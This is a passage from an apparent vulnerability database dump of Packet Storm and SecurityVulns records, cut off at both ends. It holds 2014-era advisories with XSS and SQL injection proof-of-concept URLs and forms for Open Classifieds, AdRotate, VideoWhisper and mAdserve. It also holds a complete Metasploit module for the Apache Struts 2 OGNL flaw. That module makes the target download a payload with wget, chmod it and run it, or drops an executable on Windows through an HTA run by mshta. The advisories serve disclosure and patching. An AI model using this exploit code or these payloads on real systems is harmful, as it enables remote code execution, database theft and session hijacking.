\nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Open Classifieds, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Cross-Site Scripting (XSS) in Open Classifieds: CVE-2014-2024 \n \nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed via the URI to \"/shared-apartments-rooms/\" URL. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \n \nhttp://[host]/shared-apartments-rooms/</title><script>alert(%22immuniweb%22)</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Open Classifieds 2-2.1.3 \n \nMore Information: \nhttps://github.com/open-classifieds/openclassifieds2/issues/556 \nhttps://github.com/open-classifieds/openclassifieds2/commit/45ee8fb601a91b8a4238229580a32a4fd8d96ef9 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23204 - https://www.htbridge.com/advisory/HTB23204 - Cross-Site Scripting (XSS) in Open Classifieds. \n[2] Open Classifieds - http://open-classifieds.com - Open Classifieds is web software you can use to create a beautiful classifieds or listings. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125675/openclassifieds2212-xss.txt"}, {"lastseen": "2016-12-05T22:15:04", "references": [], "description": "", "edition": 1, "reporter": "High-Tech Bridge SA", "published": "2014-02-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "AdRotate 3.9.4 SQL Injection", "type": "packetstorm", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1854"], "modified": "2014-02-21T00:00:00", "id": "PACKETSTORM:125330", "href": "https://packetstormsecurity.com/files/125330/AdRotate-3.9.4-SQL-Injection.html", "sourceData": "`Advisory ID: HTB23201 \nProduct: AdRotate \nVendor: AJdG Solutions \nVulnerable Version(s): 3.9.4 and probably prior \nTested Version: 3.9.4 \nAdvisory Publication: January 30, 2014 [without technical details] \nVendor Notification: January 30, 2014 \nVendor Patch: January 31, 2014 \nPublic Disclosure: February 20, 2014 \nVulnerability Type: SQL Injection [CWE-89] \nCVE Reference: CVE-2014-1854 \nRisk Level: High \nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks. \n \n \n1) SQL Injection in AdRotate: CVE-2014-1854 \n \nThe vulnerability exists due to insufficient validation of \"track\" HTTP GET parameter passed to \n\"/wp-content/plugins/adrotate/library/clicktracker.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe following PoC code contains a base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into SQL query and will output MySQL server version: \n \nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ== \n \nSuccessful exploitation will result in redirection to local URI that contains version of the MySQL server: \nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to AdRotate 3.9.5 \n \nMore Information: \nhttp://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/ \nhttp://wordpress.org/plugins/adrotate/changelog/ \nhttp://www.adrotateplugin.com/development/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23201 - https://www.htbridge.com/advisory/HTB23201 - SQL Injection in AdRotate. \n[2] AdRotate - http://wordpress.org/plugins/adrotate/ - AdRotate for WordPress. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125330/adrotate-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:11:34", "references": [], "edition": 1, "description": "", "reporter": "Mahmoud Ghorbanzadeh", "published": "2014-04-25T00:00:00", "type": "packetstorm", "title": "VideoWhisper 7 Cross Site Scripting", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2715"], "modified": "2014-04-25T00:00:00", "href": "https://packetstormsecurity.com/files/126334/VideoWhisper-7-Cross-Site-Scripting.html", "id": "PACKETSTORM:126334", "sourceData": "`Vulnerability title: Cross-site scripting (XSS) vulnerability in Videowhisper \nCVE: CVE-2014-2715 \nVendor: VideoWhisper \nProduct: Videowhisper module for Drupal 7 \nAffected version: 7 \nFixed version: \nReported by: Mahmoud Ghorbanzadeh \n \nDetails: \n \nHello, \nI found Cross-site scripting (XSS) vulnerability in the Videowhisper module for Drupal 7 (videowhisper-7.x). The vulnerability exist at line 2 and line 4 in drupal\\modules\\videowhisper\\vwrooms\\templates\\logout.tpl.php due to $_GET['module'] and $_GET['message'] variables respectively at line 347 in drupal\\modules\\videowhisper\\vwrooms\\vwrooms.module. \n \nPOC: drupal/index.php?q=vwrooms/logout&module=<script>alert('XSS1')</script>&message=<script>alert('XSS2')</script> \n \nVendor Notification: 18, Apr 2014 \n \nDiscovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers. \n \nBest Regards. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126334/videowhisper7-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:13:37", "references": [], "edition": 1, "description": "", "reporter": "sinn3r", "published": "2013-07-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2251"], "modified": "2013-07-25T00:00:00", "href": "https://packetstormsecurity.com/files/122541/Apache-Struts-2-DefaultActionMapper-Prefixes-OGNL-Code-Execution.html", "id": "PACKETSTORM:122541", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution', \n'Description' => %q{ \nThe Struts 2 DefaultActionMapper supports a method for short-circuit navigation \nstate changes by prefixing parameters with \"action:\" or \"redirect:\", followed by \na desired navigational target expression. This mechanism was intended to help with \nattaching navigational information to buttons within forms. \n \nIn Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \n\"redirectAction:\" is not properly sanitized. Since said information will be \nevaluated as OGNL expression against the value stack, this introduces the \npossibility to inject server side code. \n \nThis module has been tested successfully on Struts 2.3.15 over Tomcat 7, with \nWindows 2003 SP2 and Ubuntu 10.04 operating systems. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Takeshi Terada', # Vulnerability discovery \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit modules \n], \n'References' => \n[ \n[ 'CVE', '2013-2251' ], \n[ 'OSVDB', '95405' ], \n[ 'BID', '61189' ], \n[ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ] \n], \n'Platform' => [ 'win', 'linux'], \n'Targets' => \n[ \n['Automatic', {}], \n['Windows', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultOptions' => \n{ \n'WfsDelay' => 10 \n}, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'DisclosureDate' => 'Jul 2 2013', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']), \nOptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]), \n# It isn't OptPath becuase it's a *remote* path \nOptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ]) \n], self.class) \nend \n \ndef on_new_session(session) \nif session.type == \"meterpreter\" \nsession.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\") \nend \n \n@dropped_files.delete_if do |file| \nfalse unless file =~ /\\.exe/ \nwin_file = file.gsub(\"/\", \"\\\\\\\\\") \nif session.type == \"meterpreter\" \nbegin \nwintemp = session.fs.file.expand_path(\"%TEMP%\") \nwin_file = \"#{wintemp}\\\\#{win_file}\" \nsession.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|) \nsession.fs.file.rm(win_file) \nprint_good(\"Deleted #{file}\") \ntrue \nrescue ::Rex::Post::Meterpreter::RequestError \nprint_error(\"Failed to delete #{win_file}\") \nfalse \nend \nend \nend \n \nsuper \nend \n \ndef start_http_service \n#do not use SSL \nif datastore['SSL'] \nssl_restore = true \ndatastore['SSL'] = false \nend \n \nif (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\") \nsrv_host = Rex::Socket.source_address(rhost) \nelse \nsrv_host = datastore['SRVHOST'] \nend \n \nservice_url = srv_host + ':' + datastore['SRVPORT'].to_s \nprint_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\") \nstart_service({ \n'Uri' => { \n'Proc' => Proc.new { |cli, req| \non_request_uri(cli, req) \n}, \n'Path' => '/' \n} \n}) \n \ndatastore['SSL'] = true if ssl_restore \n \nreturn service_url \nend \n \ndef check \nuri = normalize_uri(target_uri.path) \nres = send_request_cgi({ \n'uri' => uri, \n'method' => 'GET' \n}) \n \nif res.nil? or res.code != 200 \nprint_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\") \nreturn Exploit::CheckCode::Unknown \nend \n \nproof = rand_text_alpha(6 + rand(4)) \n \nres = send_request_cgi({ \n'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\", \n'method' => 'GET' \n}) \n \nif res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Unknown \nend \n \ndef auto_target \nuri = normalize_uri(target_uri.path) \nres = send_request_cgi({ \n'uri' => uri, \n'method' => 'GET' \n}) \n \nif res.nil? or res.code != 200 \nfail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\") \nend \n \nproof = rand_text_alpha(6 + rand(4)) \n \nres = send_request_cgi({ \n'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\", \n'method' => 'GET' \n}) \n \nif res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ \nif res.headers['Location'] =~ /:\\\\/ \nreturn targets[1] # Windows \nelse \nreturn targets[2] # Linux \nend \nend \n \nfail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\") \n \nend \n \ndef exploit_linux \n \ndownfile = rand_text_alpha(8+rand(8)) \n@pl = @exe \n@pl_sent = false \n \n# \n# start HTTP service if necessary \n# \nservice_url = start_http_service \n \n# \n# download payload \n# \nfname = datastore['WritableDir'] \nfname = \"#{fname}/\" unless fname =~ %r'/$' \nfname << downfile \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# wait for payload download \n# \nwait_payload \n \nregister_file_for_cleanup(fname) \n \n# \n# chmod \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Make payload executable...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# execute \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Execute payload...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \nend \n \ndef exploit_windows \n@var_exename = rand_text_alpha(4 + rand(4)) + '.exe' \n@pl = build_hta \n@pl_sent = false \n \n# \n# start HTTP service if necessary \n# \nservice_url = start_http_service \n \n# \n# execute hta \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# wait for payload download \n# \nwait_payload \n \nregister_file_for_cleanup(@var_exename) \nend \n \ndef exploit \nif target.name =~ /Automatic/ \nprint_status(\"#{rhost}:#{rport} - Target autodetection...\") \nmy_target = auto_target \nprint_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\") \nelse \nmy_target = target \nend \n \np = exploit_regenerate_payload(my_target.platform, my_target.arch) \n@exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch}) \n \nif my_target.name =~ /Linux/ \nif datastore['PAYLOAD'] =~ /windows/ \nfail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\") \nend \nexploit_linux \nelsif my_target.name =~ /Windows/ \nif datastore['PAYLOAD'] =~ /linux/ \nfail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\") \nend \nexploit_windows \nend \nend \n \n# Handle incoming requests from the server \ndef on_request_uri(cli, request) \nvprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\") \nif (not @pl) \nprint_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\") \nreturn \nend \nprint_status(\"#{rhost}:#{rport} - Sending the payload to the server...\") \n@pl_sent = true \nsend_response(cli, @pl) \nend \n \n# wait for the data to be sent \ndef wait_payload \nprint_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\") \n \nwaited = 0 \nwhile (not @pl_sent) \nselect(nil, nil, nil, 1) \nwaited += 1 \nif (waited > datastore['HTTP_DELAY']) \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\") \nend \nend \nend \n \ndef build_hta \nvar_shellobj = rand_text_alpha(rand(5)+5); \nvar_fsobj = rand_text_alpha(rand(5)+5); \nvar_fsobj_file = rand_text_alpha(rand(5)+5); \nvar_vbsname = rand_text_alpha(rand(5)+5); \nvar_writedir = rand_text_alpha(rand(5)+5); \n \nvar_origLoc = rand_text_alpha(rand(5)+5); \nvar_byteArray = rand_text_alpha(rand(5)+5); \nvar_writestream = rand_text_alpha(rand(5)+5); \nvar_strmConv = rand_text_alpha(rand(5)+5); \n \n# Doing in this way to bypass the ADODB.Stream restrictions on JS, \n# even when executing it as an \"HTA\" application \n# The encoding code has been stolen from ie_unsafe_scripting.rb \nprint_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\"); \n \n# Build the content that will end up in the .vbs file \nvbs_content = Rex::Text.to_hex(%Q| \nDim #{var_origLoc}, s, #{var_byteArray} \n#{var_origLoc} = SetLocale(1033) \n|) \n# Drop the exe payload into an ansi string (ansi ensured via SetLocale above) \n# for conversion with ADODB.Stream \nvbs_ary = [] \n# The output of this loop needs to be as small as possible since it \n# gets repeated for every byte of the executable, ballooning it by a \n# factor of about 80k (the current size of the exe template). In its \n# current form, it's down to about 4MB on the wire \n@exe.each_byte do |b| \nvbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\") \nend \nvbs_content << vbs_ary.join(\"\") \n \n# Continue with the rest of the vbs file; \n# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent \n# Then use ADODB.Stream again to write the binary to file. \n#print_status(\"Finishing vbs...\"); \nvbs_content << Rex::Text.to_hex(%Q| \nDim #{var_strmConv}, #{var_writedir}, #{var_writestream} \n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\" \n \nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\") \n \n#{var_strmConv}.Type = 2 \n#{var_strmConv}.Charset = \"x-ansi\" \n#{var_strmConv}.Open \n#{var_strmConv}.WriteText s, 0 \n#{var_strmConv}.Position = 0 \n#{var_strmConv}.Type = 1 \n#{var_strmConv}.SaveToFile #{var_writedir}, 2 \n \nSetLocale(#{var_origLoc})|) \n \nhta = <<-EOS \n<script> \nvar #{var_shellobj} = new ActiveXObject(\"WScript.Shell\"); \nvar #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\"); \nvar #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\"); \nvar #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true); \n \n#{var_fsobj_file}.Write(unescape(\"#{vbs_content}\")); \n#{var_fsobj_file}.Close(); \n \n#{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true); \n#{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false); \n#{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\"); \nwindow.close(); \n</script> \nEOS \n \nreturn hta \nend \n \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122541/struts_default_action_mapper.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:19:29", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-04-16T00:00:00", "type": "packetstorm", "title": "MobFox mAdserver 2.0 SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2654"], "modified": "2014-04-16T00:00:00", "href": "https://packetstormsecurity.com/files/126190/MobFox-mAdserver-2.0-SQL-Injection.html", "id": "PACKETSTORM:126190", "sourceData": "`Advisory ID: HTB23209 \nProduct: mAdserve \nVendor: MobFox \nVulnerable Version(s): 2.0 and probably prior \nTested Version: 2.0 \nAdvisory Publication: March 26, 2014 [without technical details] \nVendor Notification: March 26, 2014 \nPublic Disclosure: April 16, 2014 \nVulnerability Type: SQL Injection [CWE-89] \nCVE Reference: CVE-2014-2654 \nRisk Level: Medium \nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) \nSolution Status: Solution Available \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple SQL injection vulnerabilities in mAdserve, which can be exploited to execute arbitrary SQL commands in application\u2019s database and compromise vulnerable website. \n \n \n1) SQL Injection in mAdserve: CVE-2014-2654 \n \n1.1 The vulnerability exists due to insufficient sanitization of user Input passed via the \"id\" HTTP GET parameter to \"/www/cp/edit_ad_unit.php\" script. A remote authenticated attacker can inject and execute arbitrary SQL commands in application\u2019s database and gain complete control over the application. \n \nThe exploitation example below displays version of MySQL server: \n \nhttp://[host]/www/cp/edit_ad_unit.php?id=1%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,version%28%29,13,14,15,16,17%20--%202 \n \n \n1.2 Input passed via the \"id\" HTTP GET parameter to \"/www/cp/view_adunits.php\" script is not properly sanitised before being used in a SQL query. A remote authenticated attacker can inject and execute arbitrary SQL commands in application\u2019s database and gain complete control over the application. \n \nThe exploitation example below displays version of MySQL server: \n \nhttp://[host]/www/cp/view_adunits.php?id=1%27%20UNION%20SELECT%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20--%202 \n \n \n1.3 Input passed via the \"id\" HTTP GET parameter to \"/www/cp/edit_campaign.php\" script is not properly sanitised before being used in a SQL query. A remote authenticated attacker can inject and execute arbitrary SQL commands in application\u2019s database and gain complete control over the application. \n \nThe exploitation example below displays version of MySQL server: \n \nhttp://[host]/www/cp/edit_campaign.php?id=1%27%20UNION%20SELECT%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20--%202 \n \n \nSuccessful exploitation of these vulnerabilities requires the attacker to have an account and to be logged in. User accounts are manually created by mAdserve administrator. \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nVendor did not reply to 3 notifications by email, 3 notifications via contact form, 1 notification via twitter. Currently we are not aware of any official solution for this vulnerability. \n \nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23209-patch.zip \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23209 - https://www.htbridge.com/advisory/HTB23209 - SQL Injection in mAdserve. \n[2] mAdserve - http://www.madserve.org/ - The Open Source Mobile Ad Server for Publishers. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126190/madserver-sql.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "references": [], "description": "\r\n\r\nAdvisory ID: HTB23199\r\nProduct: VideoWhisper Live Streaming Integration\r\nVendor: VideoWhisper\r\nVulnerable Version(s): 4.27.3 and probably prior\r\nTested Version: 4.27.3\r\nAdvisory Publication: February 6, 2014 [without technical details]\r\nVendor Notification: February 6, 2014 \r\nVendor Patch: February 7, 2014 \r\nPublic Disclosure: February 27, 2014 \r\nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]\r\nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908\r\nRisk Level: Critical \r\nCVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files.\r\n\r\n\r\n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905\r\n\r\nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php". A remote attacker can upload and execute arbitrary PHP file on the target system. \r\n\r\nThe following PoC code demonstrates exploitation of the vulnerability:\r\n\r\nAfter successful exploitation the remote shell will be accessible via the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg\r\n\r\nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.\r\n\r\n\r\n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906\r\n\r\n2.1 The vulnerability exists due to insufficient filtration of "m" HTTP POST parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u2019s widget. The script will be also executed in administrative section on the following page: \r\n\r\nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=live\r\n\r\nThe exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" method="post">\r\n<input type="hidden" name="s" value="1">\r\n<input type="hidden" name="u" value="1">\r\n<input type="hidden" name="r" value="1">\r\n<input type="hidden" name="m" value="<script>alert('immuniweb')</script>">\r\n</form>\r\n</body>\r\n \r\n2.2 The vulnerability exists due to insufficient filtration of "msg" HTTP POST parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page. \r\n\r\nThe exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php" method="post">\r\n<input type="hidden" name="msg" value="<script>alert('immuniweb')</script>">\r\n<input type="hidden" name="r" value="1">\r\n</form>\r\n</body>\r\n\r\nThe code will be executed when the user visits the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/uploads/[room]/Log[date].html \r\n\r\nWhere [room] is set by HTTP POST parameter r and [date] is the current date.\r\n \r\n2.3 The vulnerabilities exist due to insufficient filtration of "n" HTTP GET parameter passed to scripts "channel.php", "htmlchat.php", "video.php" and "videotext.php" within the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/" directory. A 